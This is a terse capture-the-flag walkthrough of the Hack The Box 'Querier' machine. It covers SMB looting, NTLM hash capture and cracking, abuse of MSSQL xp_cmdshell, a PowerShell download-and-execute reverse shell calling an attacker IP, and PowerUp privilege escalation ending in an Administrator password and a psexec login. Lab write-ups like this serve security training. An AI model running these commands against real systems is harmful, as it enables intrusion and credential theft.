HTB – Querier Walkthrough

Nmap

SMB Shares

Get the file and unzip it

SQL credentials found in vbaProject.bin

Use Impacket’s mssqlclient scipt to login

Try to enable xm_cmdshell but the current user is not privileged

Try to steal credentials by calling a fake share on your own server

Listen with responder

Crack the hash with john

Login again as the new user
mssqlclient.py mssql-svc@10.10.10.125 -db volume -windows-auth

Enable xp_cmdshell and now we have an RCE

Download Nishang Reverse shell from your own box with powershell command to get a reverse shellhttps://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Add the following command at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 4444

 Now execute the command on mssql to get a reverse shell
EXEC xp_cmdshell powershell iex(new-object net.webclient).downloadstring(\”http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1\”)

Privilege Escalation
Get the PowerUp.ps1 scipt to your own boxwget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Privesc/PowerUp.ps1
Then send it to Windows box:
Invoke-WebRequest 10.10.14.16:8000/PowerUp.ps1 -OutFile c:\users\mssql-svc\downloads\PowerUp.ps1

Run the script
Import-Module .\PowerUp.ps1. .\PowerUp.ps1Invoke-AllChecks

 it will give us clear text credentials form GPP cache

psexec.py Administrator:’MyUnclesAreMarioAndLuigi!!1!’@10.10.10.125

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.